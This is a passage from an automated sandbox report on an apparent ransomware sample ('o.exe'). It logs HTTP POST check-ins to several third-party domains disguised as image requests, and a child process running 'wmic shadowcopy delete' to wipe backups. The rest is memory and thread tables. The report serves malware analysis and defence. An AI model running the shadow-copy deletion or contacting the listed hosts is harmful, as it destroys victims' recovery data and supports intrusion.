Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = h5s.vn, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = includes/imgs/rukaam.jpg, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = h5s.vn/includes/imgs/rukaam.jpg True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #55
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name marketisleri.com
Server Port 80
Data Sent 236
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = marketisleri.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = marketisleri.com/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #56
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name marketisleri.com
Server Port 443
Data Sent 263
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = marketisleri.com, server_port = 443 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = includes/images/thkefu.gif, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = marketisleri.com/includes/images/thkefu.gif False 1
Fn
Close Session - True 58
Fn
HTTP Session #57
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.toflyaviacao.com.br
Server Port 80
Data Sent 250
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.toflyaviacao.com.br, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = www.toflyaviacao.com.br/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #58
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.toflyaviacao.com.br
Server Port 80
Data Sent 271
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.toflyaviacao.com.br, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = static/pics/imda.png, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = www.toflyaviacao.com.br/static/pics/imda.png True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #59
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.rment.in
Server Port 80
Data Sent 228
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.rment.in, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = www.rment.in/ False 1
Fn
Process #3: wmic.exe
21 0
»
Information Value
ID #3
File Name c:\windows\system32\wbem\wmic.exe
Command Line "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Initial Working Directory C:\Users\EEBsYm5\Desktop\
Monitor Start Time: 00:03:01, Reason: Child Process
Unmonitor End Time: 00:03:42, Reason: Self Terminated
Monitor Duration 00:00:41
OS Process Information
»
Information Value
PID 0xb10
Parent PID 0x9fc (c:\users\eebsym5\desktop\o.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username CRH2YWU7\EEBsYm5
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x B14
0x B28
0x B2C
0x B30
0x B34
0x B38
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory rw True False False -
locale.nls 0x00090000 0x000f6fff Memory Mapped File r False False False -
pagefile_0x0000000000100000 0x00100000 0x00106fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000110000 0x00110000 0x00111fff Pagefile Backed Memory rw True False False -
wmic.exe.mui 0x00120000 0x0012ffff Memory Mapped File rw False False False -
private_0x0000000000130000 0x00130000 0x00130fff Private Memory rw True False False -
private_0x0000000000140000 0x00140000 0x00140fff Private Memory rw True False False -
rpcss.dll 0x00150000 0x001abfff Memory Mapped File r False False False -
pagefile_0x0000000000150000 0x00150000 0x00150fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory r True False False -
msxml3r.dll 0x00170000 0x00170fff Memory Mapped File r False False False -
private_0x0000000000180000 0x00180000 0x0019ffff Private Memory - True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a1fff Pagefile Backed Memory r True False False -
windowsshell.manifest 0x001b0000 0x001b0fff Memory Mapped File r False False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory rw True False False -
private_0x00000000001c0000 0x001c0000 0x001cffff Private Memory rw True False False -
private_0x00000000001d0000 0x001d0000 0x0022ffff Private Memory rw True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d1fff Pagefile Backed Memory r True False False -
index.dat 0x001e0000 0x001e7fff Memory Mapped File rw True False False -
private_0x00000000001f0000 0x001f0000 0x0022ffff Private Memory rw True False False -
wmic.exe 0x00230000 0x00292fff Memory Mapped File rwx True False False -
pagefile_0x00000000002a0000 0x002a0000 0x00367fff Pagefile Backed Memory r True False False -
private_0x0000000000370000 0x00370000 0x003cffff Private Memory rw True False False -
index.dat 0x00370000 0x0037ffff Memory Mapped File rw True False False -
pagefile_0x0000000000380000 0x00380000 0x00380fff Pagefile Backed Memory r True False False -
private_0x0000000000390000 0x00390000 0x003cffff Private Memory rw True False False -
index.dat 0x003d0000 0x003fbfff Memory Mapped File rw True False False -
pagefile_0x0000000000400000 0x00400000 0x0040cfff Pagefile Backed Memory rw True False False -
private_0x0000000000420000 0x00420000 0x0051ffff Private Memory rw True False False -
pagefile_0x0000000000520000 0x00520000 0x00620fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000630000 0x00630000 0x0122ffff Pagefile Backed Memory r True False False -
private_0x0000000001230000 0x01230000 0x012bffff Private Memory rw True False False -
rsaenh.dll 0x01230000 0x0126bfff Memory Mapped File r False False False -
private_0x0000000001280000 0x01280000 0x012bffff Private Memory rw True False False -
private_0x00000000012c0000 0x012c0000 0x012fffff Private Memory rw True False False -
sortdefault.nls 0x01300000 0x015cefff Memory Mapped File r False False False -
private_0x00000000015d0000 0x015d0000 0x017bffff Private Memory rw True False False -
private_0x00000000015d0000 0x015d0000 0x016affff Private Memory rw True False False -
private_0x00000000016b0000 0x016b0000 0x0177ffff Private Memory rw True False False -
private_0x00000000016e0000 0x016e0000 0x0171ffff Private Memory rw True False False -
private_0x0000000001740000 0x01740000 0x0177ffff Private Memory rw True False False -
private_0x0000000001780000 0x01780000 0x017bffff Private Memory rw True False False -
private_0x00000000017c0000 0x017c0000 0x0195ffff Private Memory rw True False False -
kernelbase.dll.mui 0x017c0000 0x0187ffff Memory Mapped File rw False False False -
private_0x00000000018b0000 0x018b0000 0x018effff Private Memory rw True False False -
private_0x0000000001920000 0x01920000 0x0195ffff Private Memory rw True False False -
private_0x0000000001960000 0x01960000 0x01b2ffff Private Memory rw True False False -
private_0x0000000001960000 0x01960000 0x01a5ffff Private Memory rw True False False -
private_0x0000000001ab0000 0x01ab0000 0x01aeffff Private Memory rw True False False -
private_0x0000000001af0000 0x01af0000 0x01b2ffff Private Memory rw True False False -
private_0x0000000001b30000 0x01b30000 0x01f2ffff Private Memory rw True False False -
private_0x0000000001f30000 0x01f30000 0x0202ffff Private Memory rw True False False -
private_0x0000000002030000 0x02030000 0x0223ffff Private Memory rw True False False -
pagefile_0x0000000002030000 0x02030000 0x0210efff Pagefile Backed Memory r True False False -
private_0x0000000002190000 0x02190000 0x021cffff Private Memory rw True False False -
private_0x0000000002200000 0x02200000 0x0223ffff Private Memory rw True False False -
private_0x00000000023b0000 0x023b0000 0x023bffff Private Memory rw True False False -
msxml3.dll 0x6c720000 0x6c852fff Memory Mapped File rwx False False False -
wbemprox.dll 0x6ebe0000 0x6ebe9fff Memory Mapped File rwx False False False -
ntdsapi.dll 0x6ebf0000 0x6ec07fff Memory Mapped File rwx False False False -
fastprox.dll 0x6ec10000 0x6eca5fff Memory Mapped File rwx False False False -
wbemsvc.dll 0x6ef00000 0x6ef0efff Memory Mapped File rwx False False False -
wbemcomn.dll 0x6f7c0000 0x6f81bfff Memory Mapped File rwx False False False -
framedynos.dll 0x6f920000 0x6f954fff Memory Mapped File rwx False False False -
msvcr90.dll 0x713b0000 0x71452fff Memory Mapped File rwx False False False -
msoxmlmf.dll 0x71f00000 0x71f0cfff Memory Mapped File rwx False False False -
winnsi.dll 0x737c0000 0x737c6fff Memory Mapped File rwx False False False -
iphlpapi.dll 0x737d0000 0x737ebfff Memory Mapped File rwx False False False -
wtsapi32.dll 0x73d60000 0x73d6cfff Memory Mapped File rwx False False False -
uxtheme.dll 0x741e0000 0x7421ffff Memory Mapped File rwx False False False -
comctl32.dll 0x74360000 0x744fdfff Memory Mapped File rwx False False False -
rsaenh.dll 0x74bf0000 0x74c2afff Memory Mapped File rwx False False False -
dnsapi.dll 0x74cd0000 0x74d13fff Memory Mapped File rwx False False False -
cryptsp.dll 0x74e50000 0x74e65fff Memory Mapped File rwx False False False -
secur32.dll 0x75290000 0x75297fff Memory Mapped File rwx False False False -
sspicli.dll 0x752b0000 0x752cafff Memory Mapped File rwx False False False -
cryptbase.dll 0x752d0000 0x752dbfff Memory Mapped File rwx False False False -
rpcrtremote.dll 0x75370000 0x7537dfff Memory Mapped File rwx False False False -
profapi.dll 0x75380000 0x7538afff Memory Mapped File rwx False False False -
msasn1.dll 0x753f0000 0x753fbfff Memory Mapped File rwx False False False -
crypt32.dll 0x75420000 0x7553cfff Memory Mapped File rwx False False False -
kernelbase.dll 0x75540000 0x75589fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x75680000 0x75720fff Memory Mapped File rwx False False False -
clbcatq.dll 0x75780000 0x75802fff Memory Mapped File rwx False False False -
nsi.dll 0x75810000 0x75815fff Memory Mapped File rwx False False False -
shell32.dll 0x75830000 0x76479fff Memory Mapped File rwx False False False -
lpk.dll 0x76480000 0x76489fff Memory Mapped File rwx False False False -
imm32.dll 0x76490000 0x764aefff Memory Mapped File rwx False False False -
wininet.dll 0x76650000 0x76744fff Memory Mapped File rwx False False False -
ole32.dll 0x76750000 0x768abfff Memory Mapped File rwx False False False -
kernel32.dll 0x76910000 0x769e3fff Memory Mapped File rwx False False False -
advapi32.dll 0x769f0000 0x76a8ffff Memory Mapped File rwx False False False -
msvcrt.dll 0x76a90000 0x76b3bfff Memory Mapped File rwx False False False -
user32.dll 0x76b40000 0x76c08fff Memory Mapped File rwx False False False -
oleaut32.dll 0x76c10000 0x76c9efff Memory Mapped File rwx False False False -
msctf.dll 0x76ca0000 0x76d6bfff Memory Mapped File rwx False False False -
usp10.dll 0x76d70000 0x76e0cfff Memory Mapped File rwx False False False -
shlwapi.dll 0x76e10000 0x76e66fff Memory Mapped File rwx False False False -
urlmon.dll 0x76e70000 0x76fa5fff Memory Mapped File rwx False False False -
iertutil.dll 0x76fb0000 0x771aafff Memory Mapped File rwx False False False -
ntdll.dll 0x77230000 0x7736bfff Memory Mapped File rwx False False False -
ws2_32.dll 0x77380000 0x773b4fff Memory Mapped File rwx False False False -
sechost.dll 0x773c0000 0x773d8fff Memory Mapped File rwx False False False -
gdi32.dll 0x773e0000 0x7742dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x77470000 0x77470fff Memory Mapped File rwx False False False -
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd9000 0x7ffd9000 0x7ffd9fff Private Memory rw True False False -
private_0x000000007ffda000 0x7ffda000 0x7ffdafff Private Memory rw True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffdbfff Private Memory rw True False False -
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory rw True False False -
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
Host Behavior
COM (6)
»
Operation Class Interface Additional Information Success Count Logfile
Create WBEMLocator IWbemLocator cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create F6D90F12-9C73-11D3-B32E-00C04F990BB4 2933BF95-7B36-11D2-B20E-00C04F983E60 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli\ms_409 True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\CRH2YWU7\ROOT\CIMV2 True 1
Fn
Execute WBEMLocator IWbemServices method_name = ExecQuery, query_language = WQL, query = SELECT * FROM Win32_ShadowCopy True 1
Fn
Registry (5)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging, data = 48 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory, data = 37 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Log File Max Size, data = 54 True 1
Fn
Module (3)
»
Operation Module Additional Information Success Count Logfile
Load C:\Windows\system32\kernel32.dll base_address = 0x76910000 True 1
Fn
Get Handle c:\windows\system32\wbem\wmic.exe base_address = 0x230000 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x769624c2 True 1
Fn
System (6)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = CRH2YWU7 True 1
Fn
Get Time type = System Time, time = 2018-09-24 10:36:53 (UTC) True 1
Fn
Get Time type = Ticks, time = 191444 True 1
Fn
Get Time type = Local Time, time = 2018-09-24 08:36:54 (Local Time) True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 2
Fn
Process #11: System
0 0
»
Information Value
ID #11
File Name System
Command Line -
Initial Working Directory -
Monitor Start Time: 00:05:12, Reason: Kernel Analysis
Unmonitor End Time: 00:05:21, Reason: Terminated by Timeout
Monitor Duration 00:00:09
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x4
Parent PID 0xffffffffffffffff (Unknown)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 8
0x 14
0x 10
0x C
0x 18
0x 1C
0x 20
0x 24
0x 28
0x 2C
0x 30
0x 34
0x 38
0x 3C
0x 40
0x 44
0x 48
0x 74
0x 4C
0x 50
0x 54
0x 58
0x 5C
0x 60
0x 64
0x 68
0x 6C
0x 70
0x 78
0x 7C
0x 80
0x 84
0x 88
0x 8C
0x 90
0x 94
0x 98
0x 9C
0x A0
0x A4
0x A8
0x AC
0x B0
0x B4
0x B8
0x BC
0x C0
0x C4
0x C8
0x CC
0x D0
0x D4
0x D8
0x DC
0x F4
0x F8
0x FC
0x 100
0x 104
0x 108
0x 10C
0x 110
0x 114
0x 118
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000010000 0x00010000 0x00032fff Pagefile Backed Memory rw True False False -
Process #13: smss.exe
0 0
»
Information Value
ID #13
File Name c:\windows\system32\smss.exe
Command Line \SystemRoot\System32\smss.exe
Initial Working Directory C:\Windows
Monitor Start Time: 00:05:17, Reason: Child Process
Unmonitor End Time: 00:05:21, Reason: Terminated by Timeout
Monitor Duration 00:00:04
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xe0
Parent PID 0x4 (System)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x E4
0x E8
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x (null) 0x00000000 0x000fffff Private Memory rw True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory rw True False False -
private_0x00000000002d0000 0x002d0000 0x0030ffff Private Memory rw True False False -
smss.exe 0x48410000 0x48422fff Memory Mapped File rwx False False False -
ntdll.dll 0x77a80000 0x77bbbfff Memory Mapped File rwx False False False -
apisetschema.dll 0x77cc0000 0x77cc0fff Memory Mapped File rwx False False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd9000 0x7ffd9000 0x7ffd9fff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
Process #14: autochk.exe
0 0
»
Information Value
ID #14
File Name c:\windows\system32\autochk.exe
Command Line \??\C:\Windows\system32\autochk.exe *
Initial Working Directory C:\Windows\system32
Monitor Start Time: 00:05:17, Reason: Child Process
Unmonitor End Time: 00:05:17, Reason: Self Terminated
Monitor Duration 00:00:00
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xec
Parent PID 0xe0 (c:\windows\system32\smss.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x F0
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
private_0x0000000000170000 0x00170000 0x001affff Private Memory rw True False False -
autochk.exe 0x00cd0000 0x00d75fff Memory Mapped File rwx False False False -
ntdll.dll 0x77a80000 0x77bbbfff Memory Mapped File rwx False False False -
apisetschema.dll 0x77cc0000 0x77cc0fff Memory Mapped File rwx False False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image